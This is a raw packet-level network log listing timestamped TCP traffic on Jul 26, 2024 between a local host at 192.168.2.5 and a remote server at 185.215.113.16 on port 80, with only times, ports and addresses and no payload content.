Jul 26, 2024 17:56:22.314774036 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.314789057 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.314810038 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.314821005 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.314825058 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.314825058 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.314825058 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.314825058 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.314841986 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.314843893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.314860106 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.314878941 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.314889908 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.314898968 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.314898968 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.314918995 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.314950943 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.315115929 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315138102 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315149069 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315169096 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315180063 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315201044 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315212011 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315229893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315237999 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.315237999 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.315237999 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.315237999 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.315246105 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315263033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315274000 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315285921 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315294981 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315316916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315323114 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.315323114 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.315330982 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315354109 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.315395117 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.315395117 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.315395117 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.378479004 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.378496885 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.378508091 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.378559113 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.378568888 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.378590107 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.378603935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.378654957 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.378654957 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.378655910 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.382617950 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382628918 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382647991 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382672071 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.382708073 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382719040 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382736921 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382746935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382848978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382849932 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.382849932 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.382849932 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.382860899 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382888079 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382906914 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382913113 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.382917881 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382937908 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382949114 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382966995 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382983923 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.382988930 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.382988930 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.382988930 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383177996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383188963 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383208036 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383215904 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383215904 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383215904 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383219004 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383235931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383255005 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383268118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383285999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383297920 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383301020 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383301020 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383301020 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383301020 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383325100 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383336067 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383356094 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383398056 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383398056 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383398056 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383398056 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383445978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383455992 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383474112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383487940 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383542061 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383542061 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383542061 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383579016 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383593082 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383673906 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383683920 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383698940 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383708954 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383708954 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383708954 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383719921 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383733988 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383735895 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383735895 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383752108 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383761883 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.383810043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383810043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383810043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.383810043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.391594887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.391638041 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.391649008 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.391658068 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.391736984 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.391747952 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.391767979 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.391773939 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.391773939 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.391778946 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.391834974 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.391834974 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.391834974 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.391889095 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.391900063 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.391942024 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.391942024 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392235994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392249107 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392266989 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392318010 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392318010 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392381907 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392395020 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392411947 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392422915 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392446041 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392446041 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392520905 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392530918 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392537117 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392560005 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392570972 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392590046 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392601013 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392607927 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392607927 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392621994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392632961 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392652988 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392673969 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392673969 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392673969 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392752886 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392807007 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392821074 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392841101 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392942905 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392956018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392973900 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392990112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.392991066 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392991066 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.392991066 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393004894 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393022060 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393033028 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393055916 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393055916 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393055916 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393080950 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393093109 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393111944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393126965 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393140078 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393161058 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393162012 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393162012 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393162012 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393171072 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393188000 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393203020 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393218994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393229008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393229008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393229008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393271923 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393517971 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393532991 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393775940 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393789053 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393806934 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393831968 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393831968 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.393879890 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393891096 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393909931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.393923998 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.394242048 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.394242048 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.394242048 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.394938946 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.394956112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.394974947 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.394984961 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.395001888 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.395016909 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.395028114 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.395029068 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.395034075 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.395195007 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.395195007 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.471887112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.471911907 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.471941948 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.471955061 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.471959114 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.471980095 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.471991062 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.471995115 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.471995115 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472009897 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472009897 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472022057 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472080946 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472080946 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472110033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472122908 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472145081 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472156048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472174883 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472193956 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472196102 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472196102 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472206116 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472227097 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472230911 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472244024 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472278118 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472278118 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472291946 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472562075 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472611904 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472676039 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472723007 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472769976 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472812891 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472812891 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472812891 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.472815990 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472863913 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472913027 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.472959042 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.473002911 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.473048925 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.473094940 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.473143101 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.473155975 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.473155975 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.473156929 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.473156929 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.473189116 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.473227024 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.473256111 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.473304987 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.473351955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.473352909 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.473352909 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.473352909 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.473402023 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.473433018 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.473442078 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.473453045 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.473511934 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.483108997 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.483160019 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.483208895 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.483237982 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.483237982 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.483259916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.483303070 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.483303070 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.483304977 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.483356953 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.483405113 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.483405113 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.483405113 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.483453035 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.483500957 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.483530045 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.483530045 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.483549118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.483597994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.483639956 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.483639956 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.483639956 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.483649015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.483752012 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.511131048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.511221886 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.518044949 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.518146038 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.533375025 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.533472061 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.548688889 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.548808098 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.552802086 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.552860975 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.553061962 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.553061962 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.560911894 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.560971975 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.561048985 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.569093943 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.569154024 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.569200993 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:22.569315910 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.569315910 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:22.577064037 CEST	80	49705	185.215.113.16	192.168.2.5
